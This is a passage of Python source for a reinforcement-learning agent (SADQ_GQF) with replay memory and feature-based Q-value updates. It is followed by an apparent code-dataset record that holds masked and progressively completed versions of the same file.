q_values = None
fv = None
choice = random.choice(list(range(len(state))))
action = choice
else:
with torch.no_grad():
features_vector, q_values = self.eval_model.predict_batch(Tensor(state))
q_values = FloatTensor(q_values).view(-1)
_, choice = q_values.max(0)
action = choice
fv = features_vector[choice]
# print("q_value : {}".format(q_values))
# input()
if self.learning and self.steps % self.reinforce_config.replace_frequency == 0:
logger.debug("Replacing target model for %s" % self.name)
if self.reinforce_config.replace_frequency != 1:
self.target_model.replace(self.eval_model)
else:
self.target_model.replace_soft(self.eval_model)
# self.target_model.eval_mode()
if (self.learning and
self.steps > self.reinforce_config.update_start and
self.steps % self.reinforce_config.update_steps == 0):
self.update_time -= time.time()
self.update()
self.update_time += time.time()
self.current_reward = 0
self.previous_state = state[action]
#self.previous_action = action
return choice, fv#,q_values
def disable_learning(self, is_save = False):
logger.info("Disabled Learning for %s agent" % self.name)
if is_save:
# self.save()
self.save(force = True)
self.learning = False
self.episode = 0
def enable_learning(self):
logger.info("enabled Learning for %s agent" % self.name)
self.learning = True
self.reset()
def end_episode(self, state):
if not self.learning:
return
# print("end:")
# print(self.current_reward)
# input()
episode_time = time.time() - self.episode_time
self.reward_history.append(self.total_reward)
self.episode_time_history.append(episode_time)
total_time = sum(self.episode_time_history)
avg_time = total_time / len(self.episode_time_history)
logger.info("End of Episode %d, "
"Total reward %.2f, "
"Epsilon %.2f" % (self.episode + 1,
self.total_reward,
self.epsilon))
logger.debug("Episode Time: %.2fs (%.2fs), "
"Prediction Time: %.2f, "
"Update Time %.2f" % (episode_time,
avg_time,
self.prediction_time,
self.update_time))
self.episode += 1
self.summary.add_scalar(tag='%s/Episode Reward' % self.name,
scalar_value=self.total_reward,
global_step=self.episode)
self.memory.add(self.previous_state,
None,
self.current_reward,
state.reshape(-1, self.state_length), 1,
self.features)
# print("final : {}".format(self.current_reward) )
# input()
# print(1, self.features)
self.save()
self.reset()
def reset(self):
self.episode_time = time.time()
self.current_reward = 0
self.total_reward = 0
self.previous_state = None
self.previous_action = None
self.prediction_time = 0
self.update_time = 0
self.features = None
def restore_state(self):
restore_path = self.network_config.network_path + "/adaptive.info"
if self.network_config.network_path and os.path.exists(restore_path) and self.memory_resotre:
logger.info("Restoring state from %s" % self.network_config.network_path)
with open(restore_path, "rb") as file:
info = pickle.load(file)
self.steps = info["steps"]
# self.best_reward_mean = info["best_reward_mean"]
self.episode = info["episode"]
self.memory.load(self.network_config.network_path)
print("lenght of memeory: ", len(self.memory))
def save(self, force=False, appendix=""):
info = {
"steps": self.steps,
"best_reward_mean": self.best_reward_mean,
"episode": self.episode
}
if (len(self.reward_history) >= self.network_config.save_steps and
self.episode % self.network_config.save_steps == 0) or force:
total_reward = sum(self.reward_history[-self.network_config.save_steps:])
current_reward_mean = total_reward / self.network_config.save_steps
if force: #or current_reward_mean >= self.best_reward_mean:
print("*************saved*****************", current_reward_mean, self.best_reward_mean)
if not force:
self.best_reward_mean = current_reward_mean
logger.info("Saving network. Found new best reward (%.2f)" % total_reward)
self.eval_model.save_network(appendix = appendix)
self.target_model.save_network(appendix = appendix)
# self.eval_model.save_network()
# self.target_model.save_network()
with open(self.network_config.network_path + "/adaptive.info", "wb") as file:
pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)
self.memory.save(self.network_config.network_path)
print("lenght of memeory: ", len(self.memory))
else:
logger.info("The best reward is still %.2f. Not saving" % self.best_reward_mean)
def reward(self, r):
self.total_reward += r
self.current_reward += r
def passFeatures(self, features):
self.features = features.copy()
return
def summary_test(self, reward, epoch):
self.summary.add_scalar(tag='%s/eval reward' % self.name,
scalar_value=reward, global_step=epoch * 40)
def summary_GVFs_loss(self, loss, epoch):
self.summary.add_scalar(tag='%s/GVFs loss' % self.name,
scalar_value=loss, global_step=epoch * 40)
def update(self):
if len(self.memory._storage) <= self.reinforce_config.batch_size:
return
# self.eval_model.train_mode()
beta = self.beta_schedule.value(self.steps)
self.summary.add_scalar(tag='%s/Beta' % self.name,
scalar_value=beta, global_step=self.steps)
if self.reinforce_config.use_prior_memory:
batch = self.memory.sample(self.reinforce_config.batch_size, beta)
(states, actions, reward, next_states,
is_terminal, weights, batch_idxes) = batch
self.summary.add_histogram(tag='%s/Batch Indices' % self.name,
values=Tensor(batch_idxes),
global_step=self.steps)
else:
batch = self.memory.sample(self.reinforce_config.batch_size)
(states, actions, reward, next_states, is_terminal, features_vector) = batch
states = FloatTensor(states)
# print(states.size())
# next_states = FloatTensor(next_states)
terminal = FloatTensor([1 if t else 0 for t in is_terminal])
reward = FloatTensor(reward)
features_vector = FloatTensor(features_vector)
batch_index = torch.arange(self.reinforce_config.batch_size,
dtype=torch.long)
# Current Q Values
feature_values, q_values = self.eval_model.predict_batch(states)
q_values = q_values.flatten()
q_max = []
f_max = []
for i, ns in enumerate(next_states):
feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns).view(-1, self.state_length))
q_value_max, idx = q_n.max(0)
features_max = feature_n[idx]
q_max.append(q_value_max)
if self.network_config.version in ["v10", "v11"]:
# print(features_max)
# print(ns[idx, 63:67])
# print(states[i, 63:67])
# print(features_max.size(), FloatTensor(ns).view(-1, self.state_length).size(), states.size())
features_max[:, :3] = (features_max[:, :3] * ns[idx, 65]) / states[i, 65]
features_max[:, 3:6] = (features_max[:, 3:6] * ns[idx, 66]) / states[i, 66]
features_max[:, 6:9] = (features_max[:, 6:9] * ns[idx, 63]) / states[i, 63]
features_max[:, 9:12] = (features_max[:, 9:12] * ns[idx, 64]) / states[i, 64]
features_max[features_max == float('inf')] = 0
# print(features_max)
# input()
f_max.append(features_max.view(-1))
# if torch.sum(terminal == torch.sum(features_vector, dim = 1)) != len(terminal):
# print(terminal)
# print(features_vector)
# input()
q_max = torch.stack(q_max, dim = 1).view(-1)
f_max = torch.stack(f_max)
q_max = (1 - terminal) * q_max
f_max = (1 - terminal.view(-1, 1)) * f_max
q_target = reward + self.reinforce_config.discount_factor * q_max
f_target = features_vector + self.reinforce_config.discount_factor * f_max
# if torch.sum(reward).item() > 0:
# print(reward)
# print(feature_values)
# print(q_target)
# print(q_values)
# input()
# update model
if (torch.sum(feature_values != feature_values).item() + torch.sum(f_target != f_target)).item() > 0:
# print("1")
# print(features_vector)
# print("2")
# print(feature_values)
# print("3")
# print(f_target)
# print("4")
# print(f_max)
# print("5")
# print(states.tolist())
# input()
f_target[f_target != f_target] = 0
self.eval_model.fit(q_values, q_target, feature_values, f_target)
# Update priorities
if self.reinforce_config.use_prior_memory:
td_errors = q_values - q_target
new_priorities = torch.abs(td_errors) + 1e-6 # prioritized_replay_eps
self.memory.update_priorities(batch_idxes, new_priorities.data)
def load_model(self, model):
self.eval_model.replace(model)
def load_weight(self, weight_dict):
self.eval_model.load_weight(weight_dict)
def load_model(self, model):
self.eval_model.replace(model)
def load_weight(self, new_feature_weights, new_q_weights):
    """Load separate state dicts into the feature and Q sub-networks.

    ``new_feature_weights`` goes to the feature head and
    ``new_q_weights`` to the Q head of the evaluation model.
    """
    # The 'feautre_model' spelling presumably mirrors the attribute as
    # declared on feature_q_model (likely a typo there) — do not "fix"
    # it here without renaming it at the definition site too.
    evaluator = self.eval_model
    evaluator.feautre_model.load_state_dict(new_feature_weights)
    evaluator.q_model.load_state_dict(new_q_weights)
|
normal
|
{
"blob_id": "424a0e8a7a80e24aec4bdb9b8c84fd9a5e6090c6",
"index": 6782,
"step-1": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n <mask token>\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n <mask token>\n <mask token>\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / 
len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n <mask token>\n <mask token>\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n <mask token>\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n 
(states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = 
q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n <mask token>\n <mask token>\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-2": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if 
self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n 
(self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n <mask token>\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n <mask token>\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, 
is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = 
torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n <mask token>\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-3": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if 
self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n 
(self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n\n def save(self, force=False, appendix=''):\n info = {'steps': self.steps, 'best_reward_mean': self.\n best_reward_mean, 'episode': self.episode}\n if (len(self.reward_history) >= self.network_config.save_steps and \n self.episode % self.network_config.save_steps == 0 or force):\n total_reward = sum(self.reward_history[-self.network_config.\n save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n if force:\n print('*************saved*****************',\n current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info('Saving network. 
Found new best reward (%.2f)' %\n total_reward)\n self.eval_model.save_network(appendix=appendix)\n self.target_model.save_network(appendix=appendix)\n with open(self.network_config.network_path +\n '/adaptive.info', 'wb') as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n else:\n logger.info('The best reward is still %.2f. Not saving' %\n self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = 
q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-4": "import logging\nimport time\nimport random\nimport pickle\nimport os\nfrom sys import maxsize\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom baselines.common.schedules import LinearSchedule\nfrom abp.utils import clear_summary_path\nfrom abp.models.feature_q_model import feature_q_model\nfrom abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom\nimport numpy as np\nlogger = logging.getLogger('root')\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nIntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n\nclass SADQ_GQF(object):\n \"\"\"Adaptive which uses the SADQ algorithm\"\"\"\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n 